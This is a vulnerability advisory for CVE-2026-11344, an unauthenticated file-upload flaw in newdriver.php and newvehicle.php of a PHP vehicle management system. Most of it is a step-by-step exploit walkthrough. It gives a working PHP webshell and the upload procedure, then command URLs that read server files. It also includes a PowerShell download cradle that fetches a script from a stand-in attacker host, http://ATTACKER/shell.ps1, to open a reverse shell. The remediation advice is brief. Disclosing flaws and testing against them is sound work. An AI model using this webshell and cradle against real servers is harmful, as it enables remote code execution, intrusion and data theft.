CVE-2026-11344

An unauthenticated attacker can directly access the newdriver.php endpoint, which handles new driver registrations. The 'photo' upload parameter does not perform any validation on the file type, allowing an attacker to upload a PHP webshell. This webshell is then saved to the /picture/ directory, enabling the attacker to execute arbitrary OS commands by accessing the uploaded file remotely. The same vulnerability exists in the newvehicle.php file [ref_id=1].

The vulnerability resides in the newdriver.php and newvehicle.php files, specifically within the 'photo' upload parameter. The application saves the uploaded shell to the /picture/ directory [ref_id=1].

The advisory does not specify any patches or fixes. Remediation guidance suggests implementing proper file type validation, extension filtering, and content inspection for all file uploads to prevent unrestricted file uploads.

Step 1 — Confirm unauthenticated access to newdriver.php Open a fresh browser with no session (incognito/private window). Navigate directly to the endpoint: http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newdriver.php

The New Driver Form loads successfully with no authentication check and no redirect to login.

Step 2 — Prepare the PHP webshell Create a simple PHP command execution webshell: <?php system($_GET['cmd']); ?> Save it as shell.php (or any .php filename).

Step 3 — Submit the form with the webshell as the photo Fill in the driver form fields with any values and select the PHP webshell as the photo upload: Driver Name: test Mobile: 1234567890 Driver Joining Date: 2026-05-19 National ID: test License No: test License End Date: 2026-05-30 Driver Address: test Photo: shell.php ← PHP webshell uploaded here

Click Submit Query.

Step 4 — Shell upload confirmed The application responds with "Registration Completed!" — confirming the PHP shell was accepted and saved with no validation.

Step 5 — Execute arbitrary commands via the uploaded shell Navigate to the uploaded shell in the /picture/ directory and pass OS commands via the cmd parameter: http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/picture/shell.php?cmd=whoami

The server executes the command and returns the output:

Step 6 — Further command execution examples # Read sensitive files http://TARGET/.../picture/shell.php?cmd=type+C:\xampp\htdocs\VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\newdriver.php

# List web root http://TARGET/.../picture/shell.php?cmd=dir+C:\xampp\htdocs\

# Full reverse shell via PowerShell http://TARGET/.../picture/shell.php?cmd=powershell+-c+"IEX(New-Object+Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

Second Affected Endpoint — newvehicle.php The identical vulnerability exists in newvehicle.php. An unauthenticated attacker can access the Add New Vehicle form, upload a PHP webshell via the vehicle photo field, and achieve RCE through the same method. http://TARGET/VEHICLE_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/newvehicle.php

Both endpoints share the same root cause: no session validation and no file upload restrictions. [ref_id=1]